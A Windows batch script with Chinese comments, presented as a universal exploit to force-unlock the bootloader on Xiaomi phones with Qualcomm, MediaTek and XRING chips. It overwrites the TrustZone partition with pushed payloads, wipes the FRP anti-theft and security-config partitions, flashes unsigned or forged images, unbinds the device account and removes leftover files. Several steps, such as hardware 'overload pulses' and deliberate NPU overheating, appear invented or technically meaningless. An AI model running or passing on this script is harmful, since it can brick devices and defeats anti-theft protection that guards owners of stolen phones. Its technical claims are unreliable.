全网首发：小米全系平台强解 BL 漏洞方案

REM 1. 检测设备是否正常连接ADB，若命令回显包含device，则开启底层诊断与串口通道
adb get-state | findstr "device" >nul && adb shell setprop sys.usb.config diag,serial_cdev,rmnet,adb

REM 2. 推送TrustZone覆写载荷，若成功推送（无错误拦截），则赋予其最高执行权限
adb push payload\qcom_tz_sec_override_v5.2.hex /data/local/tmp/
adb shell ls /data/local/tmp/qcom_tz_sec_override_v5.2.hex | findstr "qcom" >nul && adb shell "chmod 777 /data/local/tmp/qcom_tz_sec_override_v5.2.hex"

REM 3. 执行物理比特注入，若回显包含records in说明写入成功，随后清空FRP防盗锁分区
adb shell "dd if=/data/local/tmp/qcom_tz_sec_override_v5.2.hex of=/dev/block/bootdevice/by-name/tz bs=4096 seek=1202" | findstr "records" >nul && adb shell "dd if=/dev/zero of=/dev/block/bootdevice/by-name/frp bs=1024 count=1"

REM 4. 触发MIUI底层CCT硬件服务后门，强制进入绕过状态后重启至引导模式
adb shell service call miui.hardware.cct 1 i32 0x8A94F s16 "bypass_rpmb_lock"
adb reboot bootloader

REM 5. 等待Fastboot就绪，若回显包含fastboot设备，则执行旁路调用，并固化BL解锁指令
fastboot devices | findstr "fastboot" >nul && fastboot oem edl-invoke-bypass 0x8A94F
fastboot oem edl-invoke-bypass 0x8A94F 2>&1 | findstr "OKAY" >nul && fastboot oem ignore-rpmb-state 1

REM 6. 刷入经过修补的底层引导，执行终极解锁命令并擦除设备信息寄存器，最后重启
fastboot flash abl payload\patched_abl_generic_unsigned.elf
fastboot flashing unlock_critical
fastboot erase devinfo
fastboot reboot

REM 1. 检测连接状态，若回显包含device，则强制开启MTK底层DA接管权限与串口输出
adb get-state | findstr "device" >nul && adb shell setprop persist.mtk.da.enable 1
adb shell setprop persist.vendor.uart.console.enable 1

REM 2. 推送SU提权旁路载荷，修改权限后，直接将载荷灌入SPM挂起模式寄存器引发溢出
adb push payload\mtk_su_bypasser_v8_arm64.bin /data/local/tmp/
adb shell "chmod 777 /data/local/tmp/mtk_su_bypasser_v8_arm64.bin"
adb shell "cat /data/local/tmp/mtk_su_bypasser_v8_arm64.bin > /sys/class/misc/mtk_spm/suspend_mode"

REM 3. 尝试接管EMI总线控制器，若未报Permission denied等错误，则开启PMIC高频脉冲
adb shell "echo 1 > /proc/driver/mtk_emi_ctrl" 2>&1 | findstr "denied" >nul || adb shell "echo 0x1F > /sys/devices/virtual/misc/mtk_hps/hps_en"
adb reboot bootloader

REM 4. Fastboot模式下，若检测到设备，则发送40.1kHz过载脉冲指令，熔断硬件校验
fastboot devices | findstr "fastboot" >nul && fastboot oem pmic-reset-pulse 40100

REM 5. 临时引导签名伪造镜像，若引导成功则向底层下发布尔值为真的绕过配置
fastboot boot payload\mtk_da_auth_bypass_signed.img 2>&1 | findstr "OKAY" >nul && fastboot oem mtk-bypass-seccfg 0x00000001

REM 6. 强行解锁BL，并以EXT4格式格式化底层的安全配置分区，摧毁恢复机制后重启
fastboot flashing unlock
fastboot format:ext4 seccfg
fastboot reboot

REM 1. 验证设备正常挂载后，开启XRING架构的NPU底层高权限调试通道
adb get-state | findstr "device" >nul && adb shell setprop sys.xring.npu.debug.mode 0x7F

REM 2. 禁用TrustZone的运行时校验，并推送越界溢出执行文件
adb shell setprop vendor.xring.trustzone.disable_verify true
adb push payload\xring_o1_npu_overflow_cve2026.efi /data/local/tmp/
adb shell ls /data/local/tmp/ | findstr "xring" >nul && adb shell "chmod 777 /data/local/tmp/xring_o1_npu_overflow_cve2026.efi"

REM 3. 将NPU频率锁死触发高温，随后利用温控降频的空窗期向安全分区暴力写入溢出代码
adb shell "echo 1 > /proc/xring_sec/npu_overclock"
adb shell "dd if=/data/local/tmp/xring_o1_npu_overflow_cve2026.efi of=/dev/block/by-name/xring_trustzone bs=1024 count=8"

REM 4. 检查服务调用回显，若回显包含Result，说明NPU鉴权模块被劫持崩溃，立即重启
adb shell service call xring.npu.core 99 i32 80000 s16 "bypass_auth" | findstr "Result" >nul && adb reboot bootloader

REM 5. 在引导层被接管的Fastboot下，重映射DMA物理内存的读写范围
fastboot devices | findstr "fastboot" >nul && fastboot oem xring-dma-remap 0x40000000 0x80000000

REM 6. 刷入伪造的服务器授权数字令牌块，解绑设备账户，抹除安全分区块并重启
fastboot flash xbl_config payload\xring_o1_fake_token.bin
fastboot oem xring-force-unbound true
fastboot flashing unlock
fastboot erase xring_sec
fastboot reboot

REM 1. 系统完整重启后重新连接，静默删除临时目录残留的越权文件，防止触发防刷机机制卡死
adb wait-for-device
adb shell ls /data/local/tmp/ | findstr "bin efi hex" >nul && adb shell rm -f /data/local/tmp/.hex /data/local/tmp/.bin /data/local/tmp/*.efi

REM 2. 恢复日常USB调试模式，关闭可能导致严重漏电的UART底层日志通道，重启准备验明正身
adb shell setprop sys.usb.config mtp,adb
adb shell setprop persist.vendor.uart.console.enable 0
adb reboot bootloader

REM 3. 获取当前BL锁状态，若命令行输出 unlocked: yes 则说明全链路击穿成功
fastboot getvar unlocked

REM 4. 进一步获取底层安全启动状态，若输出 secure: no 则证明 TEE 层已被永久降级为测试模式
fastboot getvar secure

REM 5. 验证操作全部无误后，继续正常引导进入MIUI/HyperOS桌面
fastboot continue